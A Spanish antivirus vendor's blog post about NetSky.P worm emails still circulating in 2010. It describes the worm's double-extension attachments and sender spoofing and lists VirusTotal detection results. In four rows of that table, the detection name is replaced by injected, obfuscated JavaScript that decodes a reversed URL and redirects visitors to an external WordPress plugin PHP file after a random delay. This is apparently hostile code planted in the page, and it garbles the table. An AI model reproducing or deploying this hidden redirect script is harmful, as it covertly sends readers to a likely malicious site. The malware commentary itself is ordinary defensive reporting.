Aun llegan mails anexando NETSKY.P

Publicado el 29 noviembre 2010 ¬ 13:51 pmh.mscComentarios desactivados en Aun llegan mails anexando NETSKY.P

Desde primeros del 2004 hasta finales 2006 tuvimos una serie de NetSky que fuimos controlando con el ELINETSA, del que llegamos a hacer 42 versiones para las variantes que iban saliendo, siendo la mas prolifica la “, de la que hoy estan aun llegando mails propagando dicho virus:

Entre sus picardias caben señalar que usa doble extension para los ficheros que anexa, para que no parezcan ejecutables, por ejemplo .doc ……….. .pif , y los .pif, al igual que un bat o los cmds, son ejecutados como los EXE

Y otra de sus particularidades es que usa tecnicas spoofing para el envio de mails, de forma que falsea el remitente, y asi aparente proceder de otro ordenador, que logicamente no estará infectado ni sabrá nada de este virus, y es éste quien recibirá las broncas de los receptores de “sus” mails, asi como recibirá devueltos los que no hayan llegado a su destino, por “DELIVERY FAILED”, lo cual aun hoy muchos días recibimos consultas al respecto.

Hoy hemos recibido un mail con este anexado:

File name: document04_virus.doc […].pif
Submission date: 2010-11-29 12:39:34 (UTC)
Current status: queued (#1) queued (#2) analysing finished
Result: 43/ 43 (100.0%)
 VT Community

malware
 Safety score: 0.0% 
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2010.11.29.03 2010.11.29 Win32/Netsky.worm.29568
AntiVir 7.10.14.131 2010.11.29 Worm/Netsky.AP
Antiy-AVL 2.0.3.7 2010.11.29 Worm/Win32.NetSky
Avast 4.8.1351.0 2010.11.29 Win32:Netsky-AF
Avast5 5.0.594.0 2010.11.29 Win32:Netsky-AF
AVG 9.0.0.851 2010.11.28 I-Worm/Netsky
BitDefender 7.2 2010.11.29 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.P@mm”>W32/Netsky.P@mm
Comodo 6884 2010.11.29 Worm.Win32.Netsky.Q
DrWeb 5.0.2.03300 2010.11.29 Win32.HLLM.Netsky.18401
Emsisoft 5.0.0.50 2010.11.29 Email-Worm.Win32.NetSky!IK
eSafe 7.0.17.0 2010.11.29 Win32_Netsky_Q
eTrust-Vet 36.1.8006 2010.11.29 Win32/Netsky.P
F-Prot 4.6.2.117 2010.11.28 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:Win32.Netsky.P@mm”>Win32.Netsky.P@mm
Fortinet 4.2.254.0 2010.11.29 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:Win32.Netsky.P@mm”>Win32.Netsky.P@mm
Ikarus T3.1.1.90.0 2010.11.29 Email-Worm.Win32.NetSky
Jiangmin 13.0.900 2010.11.29 I-Worm/NetSky.q
K7AntiVirus 9.69.3103 2010.11.27 EmailWorm
Kaspersky 7.0.0.125 2010.11.29 Email-Worm.Win32.NetSky.q
McAfee 5.400.0.1158 2010.11.29 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:Netsky.P@mm”>Netsky.P@mm
nProtect 2010-11-29.01 2010.11.29 Worm/W32.NetSky.29568
Panda 10.0.2.7 2010.11.28 W32/Netsky.P.worm
PCTools 7.0.3.5 2010.11.29 Email-Worm.NetSky
Prevx 3.0 2010.11.29 High Risk Worm
Rising 22.75.06.00 2010.11.29 Worm.Mail.NetSky.la
Sophos 4.60.0 2010.11.29 W32/Netsky-P
SUPERAntiSpyware 4.40.0.1006 2010.11.29 Worm.Netsky-P
Symantec 20101.2.0.161 2010.11.29 todos los demas:  McAfee 5.400.0.1158 2010.11.29 __________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Virus, , , , , , , , , ,

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies